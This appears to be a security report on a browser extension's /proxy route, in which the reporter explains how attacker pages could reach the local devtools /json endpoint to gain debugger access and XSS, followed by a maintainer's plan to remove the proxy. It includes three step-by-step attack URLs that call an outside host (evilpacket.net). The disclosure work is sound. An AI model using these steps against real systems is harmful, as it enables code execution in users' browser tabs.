As reported by Adam Baldwin from andyet over email
Getting access to devtools

I'm curious to know what the /proxy route is actually used for on the mod_strip extension? It allows for some interesting things. Specifically, one can use that route to load a page controlled by an attacker and execute code.

Further than that, code could attempt to locate the port the devtools are running on and find the various endpoints for the open tabs at the /json endpoint.

Normally this would be blocked by same-origin policy, but because of the proxy route it's possible to get those endpoints. Having the content of that JSON file means a debugger websocket connection can be made to each of those tabs and code executed in the context of those tabs, which gives XSS on a variety of origins.

It would be pretty messy to exploit, but here is how I would go about it.

1. Make requests to the following URL to find the local port that allows proxy:
   127.0.0.1:PORT/proxy?url=http://evilpacket.net
2. Make requests to the following URL to find the devtools port that will give me the JSON endpoints. When it hits the right one it will notify the external service and we can correlate the 2 events:
   http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
3. Redirect the user to the following URL so that we can use same-origin policy to get the JSON in the next step:
   127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
The proxy is used today to proxy the favicons in order to sniff their color. We could automatically retrieve the favicon from the module server side and pass ids instead of URLs to the client side to retrieve the content of these favicons, removing the need for the proxy.